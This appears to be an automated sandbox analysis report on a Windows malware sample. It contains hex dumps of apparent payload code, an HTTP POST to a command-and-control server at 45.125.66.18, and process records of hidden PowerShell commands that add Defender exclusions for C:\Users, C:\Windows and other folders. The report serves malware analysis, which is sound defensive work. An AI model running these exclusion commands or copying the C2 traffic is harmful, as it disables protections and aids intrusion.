                                                2024-08-27 11:07:21 UTC1378INData Raw: 52 e8 88 7f 00 00 83 c4 08 89 45 ec 8b 45 f8 8b 48 08 ba 04 00 00 00 6b c2 00 81 bc 01 1a 04 00 00 4c 11 d2 ca 75 27 6a 00 8b 4d f8 8b 51 08 52 8b 45 08 50 8b 4d f8 83 c1 04 51 8b 55 f8 8b 02 50 e8 28 25 00 00 83 c4 14 e9 29 01 00 00 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 81 fa 80 00 00 00 0f 83 0a 01 00 00 8b 45 f8 8b 48 08 0f b6 55 ff 83 bc 91 1a 04 00 00 00 75 02 eb d1 8b 45 f8 8b 48 08 0f b6 55 ff 0f b6 84 11 1a 07 00 00 83 f8 01 75 3c 83 7d f0 00 75 36 8b 4d 0c 83 c1 2c 51 e8 a2 7e 00 00 83 c4 04 89 45 f4 83 7d f4 00 74 1e 8b 55 f4 52 e8 2d 10 00 00 83 c4 04 d1 e0 50 8b 45 f4 50 e8 be 7e 00 00 83 c4 08 89 45 f0 83 7d f0 00 74 16 8b 4d f8 8b 51 08 0f b6 45 ff 8b 8c 82 1a 04 00 00 3b 4d f0 74 2c 8b 55 f8 8b 42 08 0f b6 4d ff 0f b6 94
                                                Data Ascii: REEHkLu'jMQREPMQUP(%)EMMUEHUuEHUu<}u6M,Q~E}tUR-PEP~E}tMQE;Mt,UBM
                                                2024-08-27 11:07:21 UTC1378INData Raw: 0c 00 00 83 c4 08 85 c0 74 07 b8 01 00 00 00 eb 02 33 c0 8b e5 5d c3 cc cc cc cc cc 55 8b ec 83 ec 14 e8 55 05 00 00 e8 50 03 00 00 85 c0 75 07 33 c0 e9 ce 00 00 00 68 8d bd c1 3f a1 78 b0 40 00 50 e8 d5 00 00 00 83 c4 08 a3 94 b0 40 00 83 3d 94 b0 40 00 00 75 07 33 c0 e9 a6 00 00 00 c7 45 f0 90 b0 40 00 8b 4d f0 89 4d f8 c7 45 ec 78 b0 40 00 8b 55 ec 89 55 f4 8b 45 f4 83 e8 04 89 45 f4 c6 45 ff 00 eb 09 8a 4d ff 80 c1 01 88 4d ff 0f b6 55 ff 83 fa 27 73 66 8b 45 f8 83 38 00 75 16 8b 4d f4 83 c1 04 89 4d f4 8b 55 f8 83 c2 04 89 55 f8 eb d2 eb 18 8b 45 f8 8b 08 3b 0d 94 b0 40 00 75 0b 8b 55 f8 83 c2 04 89 55 f8 eb b8 8b 45 f8 8b 08 51 8b 55 f4 8b 02 50 e8 3b 00 00 00 83 c4 08 8b 4d f8 89 01 8b 55 f8 83 3a 00 75 04 33 c0 eb 10 8b 45 f8 83 c0 04 89 45 f8 eb
                                                Data Ascii: t3]UUPu3h?x@P@=@u3E@MMEx@UUEEEMMU'sfE8uMMUUE;@uUUEQUP;MU:u3EE
                                                2024-08-27 11:07:21 UTC1378INData Raw: 8c b0 40 00 83 ae 0c 5f 75 06 33 c0 eb 07 eb 05 b8 01 00 00 00 8b e5 5d c3 cc 55 8b ec 33 c0 74 2b 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 00 a0 40 00 6a 00 6a 00 6a 00 6a 00 6a 00 e8 12 77 00 00 6a 00 6a 00 ff 15 64 a0 40 00 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 50 e8 54 0d 00 00 83 c4 04 e8 4c 22 00 00 e8 e7 01 00 00 e8 32 fb ff ff 5d c3 55 8b ec e8 38 fa ff ff 85 c0 74 22 e8 9f 01 00 00 85 c0 74 19 e8 96 20 00 00 85 c0 74 10 8b 45 08 50 e8 49 0b 00 00 83 c4 04 85 c0 75 08 6a 00 ff 15 14 a0 40 00 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 c7 45 f8 00 00 00 00 33 c0 66 89 45 fc eb 0c 66 8b 4d fc 66 83 c1 01 66 89 4d fc 0f b7 55 fc 81 fa e8 03 00 00 73 19 0f b7 45 fc 8b 4d 08 83 7c 81 10 00 74 09 c7 45 f8 01 00 00 00 eb 02 eb
                                                Data Ascii: @_u3]U3t+jjjjjj@jjjjjwjjd@]UEPTL"2]U8t"t tEPIuj@]UE3fEfMffMUsEM|tE
                                                2024-08-27 11:07:21 UTC1378INData Raw: 8b 4d 08 0f b7 11 83 fa 5a 7f 0f 8b 45 08 0f b7 08 83 c1 20 8b 55 08 66 89 0a 8b 45 08 83 c0 02 89 45 08 eb c6 5d c3 cc 55 8b ec 83 ec 0c 8b 45 08 89 45 fc 8b 4d 0c 89 4d f8 8b 55 fc 8b 45 f8 66 8b 08 66 89 0a 8b 55 fc 0f b7 02 89 45 f4 8b 4d fc 83 c1 02 89 4d fc 8b 55 f8 83 c2 02 89 55 f8 83 7d f4 00 74 02 eb d1 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 08 50 e8 41 00 00 00 83 c4 04 83 c0 01 89 45 f8 8b 4d f8 d1 e1 51 e8 7d fc ff ff 83 c4 04 89 45 fc 83 7d fc 00 74 16 8b 55 f8 d1 e2 52 8b 45 08 50 8b 4d fc 51 e8 ce fc ff ff 83 c4 0c 8b 45 fc 8b e5 5d c3 cc cc cc cc 55 8b ec 51 8b 45 08 89 45 fc 8b 4d fc 0f b7 11 85 d2 74 0b 8b 45 fc 83 c0 02 89 45 fc eb eb 8b 45 fc 2b 45 08 d1 f8 8b e5 5d c3 cc cc cc cc cc 55 8b ec 51 8b 45 08
                                                Data Ascii: MZE UfEE]UEEMMUEffUEMMUU}tE]UEPAEMQ}E}tUREPMQE]UQEEMtEEE+E]UQE
                                                2024-08-27 11:07:21 UTC1378INData Raw: ff 83 c4 04 89 45 f0 68 16 04 00 00 6a 00 8b 4d f0 51 e8 1f f9 ff ff 83 c4 0c 68 16 04 00 00 8b 55 0c 03 55 f8 52 8b 45 f0 50 e8 57 f8 ff ff 83 c4 0c 8b 4d f0 51 8b 55 08 52 e8 c7 eb ff ff 83 c4 08 8b 45 f0 50 e8 ab f7 ff ff 83 c4 04 8b 4d f8 81 c1 16 04 00 00 89 4d f8 8b 55 08 8a 82 b8 0f 00 00 2c 01 8b 4d 08 88 81 b8 0f 00 00 e9 9e 00 00 00 0f b6 55 ff 0f b6 44 15 ac 83 f8 02 0f 85 8c 00 00 00 8b 4d 08 8a 91 b8 0f 00 00 80 c2 01 8b 45 08 88 90 b8 0f 00 00 68 0b 0b 00 00 e8 12 f7 ff ff 83 c4 04 89 45 ec 68 0b 0b 00 00 6a 00 8b 4d ec 51 e8 7c f8 ff ff 83 c4 0c 68 0b 0b 00 00 8b 55 0c 03 55 f8 52 8b 45 ec 50 e8 b4 f7 ff ff 83 c4 0c 8b 4d ec 51 8b 55 08 52 e8 34 e8 ff ff 83 c4 08 8b 45 ec 50 e8 08 f7 ff ff 83 c4 04 8b 4d f8 81 c1 0b 0b 00 00 89 4d f8 8b 55
                                                Data Ascii: EhjMQhUUREPWMQUREPMMU,MUDMEhEhjMQ|hUUREPMQUR4EPMMU
                                                2024-08-27 11:07:21 UTC1378INData Raw: 00 00 6a 00 8d 4d f0 51 8d 55 f8 52 6a 00 68 13 00 00 20 8b 45 08 50 ff 15 20 b1 40 00 85 c0 74 57 81 7d f8 94 01 00 00 74 12 81 7d f8 90 01 00 00 74 09 81 7d f8 f4 01 00 00 72 16 8b 4d fc 0f b6 51 08 83 fa 01 75 08 6a 00 ff 15 14 a0 40 00 eb 26 81 7d f8 c9 00 00 00 74 09 81 7d f8 c8 00 00 00 75 14 8b 45 fc 0f b6 48 08 83 f9 05 75 08 6a 00 ff 15 14 a0 40 00 6a 00 8b 55 08 52 ff 15 04 b1 40 00 e9 d1 00 00 00 81 7d 10 00 00 04 00 0f 85 94 00 00 00 8b 45 fc 8b 4d 14 8b 11 89 50 1c 8b 45 fc 8b 48 18 8b 55 fc 03 4a 1c 8b 45 fc 89 48 18 8b 4d fc 83 79 1c 00 75 21 8b 55 fc 83 7a 04 04 74 0a 8b 45 fc c7 40 04 03 00 00 00 8b 4d 0c 51 e8 bc f1 ff ff 83 c4 04 eb 4b 8b 55 fc 8b 42 18 50 8b 4d fc 8b 51 0c 52 e8 24 f3 ff ff 83 c4 08 8b 4d fc 89 41 0c 8b 55 fc 83 7a 0c
                                                Data Ascii: jMQURjh EP @tW}t}t}rMQuj@&}t}uEHuj@jUR@}EMPEHUJEHMyu!UztE@MQKUBPMQR$MAUz
                                                2024-08-27 11:07:21 UTC1378INData Raw: cc cc 55 8b ec 51 68 2d b0 40 00 8b 45 08 83 c0 20 50 e8 1b ef ff ff 83 c4 08 c7 45 fc 00 00 fe 7f 8b 4d 08 8b 55 fc 8b 82 60 02 00 00 89 81 15 08 00 00 8b 4d 08 8b 55 fc 8b 82 6c 02 00 00 89 81 0d 08 00 00 8b 4d 08 8b 55 fc 8b 82 70 02 00 00 89 81 11 08 00 00 68 06 b0 40 00 8b 4d 08 51 e8 cd ee ff ff 83 c4 08 68 52 b0 40 00 8b 55 08 83 c2 07 52 e8 b9 ee ff ff 83 c4 08 8b 45 08 50 e8 cd 5a 00 00 83 c4 04 8b 4d 08 51 e8 41 58 00 00 83 c4 04 8b 55 08 52 e8 b5 59 00 00 83 c4 04 6a 01 8b 45 08 50 e8 37 59 00 00 83 c4 08 8b 4d 08 51 e8 5b 5a 00 00 83 c4 04 8b 55 08 52 e8 2f 5a 00 00 83 c4 04 8b 45 08 50 e8 d3 59 00 00 83 c4 04 8b 4d 08 51 e8 e7 59 00 00 83 c4 04 8b 55 08 52 e8 8b 5a 00 00 83 c4 04 8b e5 5d c3 cc cc cc cc 55 8b ec 81 ec 38 0f 00 00 68 33 0f 00
                                                Data Ascii: UQh-@E PEMU`MUlMUph@MQhR@UREPZMQAXURYjEP7YMQ[ZUR/ZEPYMQYURZ]U8h3
                                                2024-08-27 11:07:21 UTC1378INData Raw: d7 f5 ff ff 02 8b 4d 14 8a 11 88 95 b0 f5 ff ff 68 21 06 00 00 6a 00 8d 85 d8 f9 ff ff 50 e8 ed e8 ff ff 83 c4 0c 8b 4d 10 51 8d 95 e8 fd ff ff 52 e8 6a ea ff ff 83 c4 08 8b 45 14 05 09 02 00 00 50 8d 8d d8 f9 ff ff 51 e8 52 ea ff ff 83 c4 08 68 08 02 00 00 8b 55 14 83 c2 01 52 8d 85 e0 fb ff ff 50 e8 97 e7 ff ff 83 c4 0c 0f b6 4d 18 51 8b 55 14 52 8d 85 d8 f9 ff ff 50 e8 2f 01 00 00 83 c4 0c 0f b6 c8 85 c9 75 05 e9 15 01 00 00 0f b6 55 18 8b 45 14 0f b6 8c 10 9a 06 00 00 83 f9 01 75 46 8b 55 0c 52 81 ec 28 04 00 00 b9 09 01 00 00 8d b5 b0 f5 ff ff 8b fc f3 a5 66 a5 a4 81 ec 24 06 00 00 b9 88 01 00 00 8d b5 d8 f9 ff ff 8b fc f3 a5 a4 8b 45 08 50 e8 b1 fc ff ff 81 c4 54 0a 00 00 e9 af 00 00 00 0f b6 4d 18 8b 55 14 0f b6 84 0a 9a 06 00 00 85 c0 0f 85 98 00
                                                Data Ascii: Mh!jPMQRjEPQRhURPMQURP/uUEuFUR(f$EPTMU
                                                2024-08-27 11:07:21 UTC1378INData Raw: 00 68 27 04 00 00 6a 00 8d 85 ac fb ff ff 50 e8 9a e3 ff ff 83 c4 0c 68 ff 00 00 00 8d 8d ac fb ff ff 51 e8 f6 4e 00 00 83 c4 08 ba 01 00 00 00 6b c2 00 c6 84 05 d3 fb ff ff 05 6a 26 6a 00 8d 4d d4 51 e8 66 e3 ff ff 83 c4 0c 8d 55 d4 52 e8 6a 00 00 00 83 c4 04 68 27 04 00 00 8d 85 ac fb ff ff 50 b9 01 00 00 00 6b d1 00 03 55 fc 52 e8 8a e2 ff ff 83 c4 0c 6a 26 8d 45 d4 50 b9 01 00 00 00 69 d1 27 04 00 00 03 55 fc 52 e8 6d e2 ff ff 83 c4 0c 6a 05 68 4d 04 00 00 8b 45 fc 50 8b 4d 08 51 e8 f6 ed ff ff 83 c4 10 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 c6 40 25 01 68 2d b0 40 00 8b 4d 08 51 e8 98 e3 ff ff 83 c4 08 5d c3 cc cc cc 55 8b ec 83 ec 0c e8 95 01 00 00 85 c0 74 09 83 3d e8 b0 40 00 00 75 0c e8 73 06 00 00 33 c0 e9 61
                                                Data Ascii: h'jPhQNkj&jMQfURjh'PkURj&EPi'URmjhMEPMQ]UE@%h-@MQ]Ut=@us3a


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.44974945.125.66.184438032C:\Reka\rapnewsa.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:07:26 UTC287OUTPOST /api/receiver/recv HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/octet-stream
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48
                                                Content-Length: 3160
                                                Host: 45.125.66.18
                                                2024-08-27 11:07:26 UTC3160OUTData Raw: 00 7b 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: {a33c7340-61ca-11ee-8c18-806e6f6e6963}
                                                2024-08-27 11:07:27 UTC231INHTTP/1.1 201 Created
                                                Server: nginx/1.18.0
                                                Date: Tue, 27 Aug 2024 11:07:27 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 4230
                                                Connection: close
                                                X-Powered-By: Express
                                                ETag: W/"1086-eeEIvwQRvsIx4B3isHTXuBfT8l0"
                                                2024-08-27 11:07:27 UTC4230INData Raw: 01 03 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii:


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.4497503.211.178.1934437992C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 11:07:30 UTC95OUTGET /get HTTP/1.1
                                                Host: httpbin.org
                                                User-Agent: Go-http-client/1.1
                                                Accept-Encoding: gzip
                                                2024-08-27 11:07:30 UTC225INHTTP/1.1 200 OK
                                                Date: Tue, 27 Aug 2024 11:07:30 GMT
                                                Content-Type: application/json
                                                Content-Length: 238
                                                Connection: close
                                                Server: gunicorn/19.9.0
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Credentials: true
                                                2024-08-27 11:07:30 UTC238INData Raw: 7b 0a 20 20 22 61 72 67 73 22 3a 20 7b 7d 2c 20 0a 20 20 22 68 65 61 64 65 72 73 22 3a 20 7b 0a 20 20 20 20 22 48 6f 73 74 22 3a 20 22 68 74 74 70 62 69 6e 2e 6f 72 67 22 2c 20 0a 20 20 20 20 22 55 73 65 72 2d 41 67 65 6e 74 22 3a 20 22 47 6f 2d 68 74 74 70 2d 63 6c 69 65 6e 74 2f 31 2e 31 22 2c 20 0a 20 20 20 20 22 58 2d 41 6d 7a 6e 2d 54 72 61 63 65 2d 49 64 22 3a 20 22 52 6f 6f 74 3d 31 2d 36 36 63 64 62 33 37 32 2d 32 64 39 62 65 32 36 39 33 66 34 63 33 37 34 38 36 65 64 61 31 32 37 39 22 0a 20 20 7d 2c 20 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 20 0a 20 20 22 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 68 74 74 70 62 69 6e 2e 6f 72 67 2f 67 65 74 22 0a 7d 0a
                                                Data Ascii: { "args": {}, "headers": { "Host": "httpbin.org", "User-Agent": "Go-http-client/1.1", "X-Amzn-Trace-Id": "Root=1-66cdb372-2d9be2693f4c37486eda1279" }, "origin": "8.46.123.33", "url": "https://httpbin.org/get"}


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:07:05:41
                                                Start date:27/08/2024
                                                Path:C:\Users\user\Desktop\UBONg7lmVR.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\UBONg7lmVR.exe"
                                                Imagebase:0x6f0000
                                                File size:52'506'624 bytes
                                                MD5 hash:D2DB9A159617250A517F9D074AB8F947
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:false

                                                Target ID:2
                                                Start time:07:05:52
                                                Start date:27/08/2024
                                                Path:C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exe"
                                                Imagebase:0xb00000
                                                File size:8'077'824 bytes
                                                MD5 hash:A499C507987982C951093E21DF0C0D96
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:Go lang
                                                Antivirus matches:
                                                • Detection: 11%, ReversingLabs
                                                • Detection: 8%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                Target ID:4
                                                Start time:07:05:58
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:07:05:58
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:07:06:09
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:07:06:09
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:07:06:19
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:07:06:19
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:07:06:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:15
                                                Start time:07:06:30
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:07:06:41
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:07:06:41
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:07:06:52
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:07:06:52
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:07:07:02
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
                                                Imagebase:0x7ff788560000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:07:07:02
                                                Start date:27/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:07:07:20
                                                Start date:27/08/2024
                                                Path:C:\Reka\rapnewsa.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Reka\rapnewsa.exe
                                                Imagebase:0x2c0000
                                                File size:38'912 bytes
                                                MD5 hash:2D4E723C184D9403B078E53F2DE74A23
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 16%, ReversingLabs
                                                • Detection: 24%, Virustotal, Browse
                                                Has exited:true

                                                Target ID:26
                                                Start time:07:07:27
                                                Start date:27/08/2024
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8032 -s 122888
                                                Imagebase:0xbc0000
                                                File size:483'680 bytes
                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:14.2%
                                                  Dynamic/Decrypted Code Coverage:99.7%
                                                  Signature Coverage:3.7%
                                                  Total number of Nodes:1128
                                                  Total number of Limit Nodes:60
                                                  execution_graph 69178 ad121d0 69179 ad121ea 69178->69179 69180 ad121fd 69178->69180 69186 ad1039c 69179->69186 69191 ad103ac 69180->69191 69182 ad12212 69184 ad12243 69182->69184 69185 ad1039c OleInitialize 69182->69185 69185->69184 69187 ad103a7 69186->69187 69188 ad1226e 69187->69188 69196 ad126a0 69187->69196 69201 ad126a8 69187->69201 69188->69180 69193 ad103b7 69191->69193 69192 ad12c86 69192->69182 69193->69192 69213 ad14a60 69193->69213 69217 ad14a50 69193->69217 69197 ad126d0 69196->69197 69200 ad126fc 69196->69200 69198 ad126d9 69197->69198 69206 ad122a8 69197->69206 69198->69188 69200->69188 69202 ad126d0 69201->69202 69205 ad126fc 69201->69205 69203 ad126d9 69202->69203 69204 ad122a8 OleInitialize 69202->69204 69203->69188 69204->69205 69205->69188 69208 ad122b3 69206->69208 69207 ad129f3 69207->69200 69208->69207 69210 ad122c4 69208->69210 69211 ad12a28 OleInitialize 69210->69211 69212 ad12a8c 69211->69212 69212->69207 69214 ad14b1e 69213->69214 69215 ad14aa4 69213->69215 69214->69192 69215->69214 69216 ad14b1c KiUserCallbackDispatcher 69215->69216 69216->69214 69218 ad14b1e 69217->69218 69219 ad14aa4 69217->69219 69218->69192 69219->69218 69220 ad14b1c KiUserCallbackDispatcher 69219->69220 69220->69218 70021 b3ab378 70022 b3ab3bd MessageBoxW 70021->70022 70024 b3ab404 70022->70024 70025 b3aae78 70026 b3aaec6 EnumThreadWindows 70025->70026 70028 b3aaebc 70025->70028 70027 b3aaef8 70026->70027 70028->70026 69221 5bd52b9 69222 5bd52be 69221->69222 69223 5bd52e2 69222->69223 69231 5bd3ccc 69222->69231 69225 5bd3ccc 2 API calls 69223->69225 69227 5bd52ee 69225->69227 69226 5bd52d4 69237 5bd3cdc 69226->69237 69229 5bd3cdc 2 API calls 69227->69229 69230 5bd52fc 69229->69230 69233 5bd3cd7 69231->69233 69232 5bdd436 69232->69226 69233->69232 69242 5bdd4b8 SendMessageW 69233->69242 69244 5bdd4b0 SendMessageW 69233->69244 69234 5bdd4a1 69234->69226 69238 5bd3ce7 69237->69238 69240 5bdd4b8 SendMessageW 69238->69240 69241 5bdd4b0 SendMessageW 69238->69241 69239 5bdd4a1 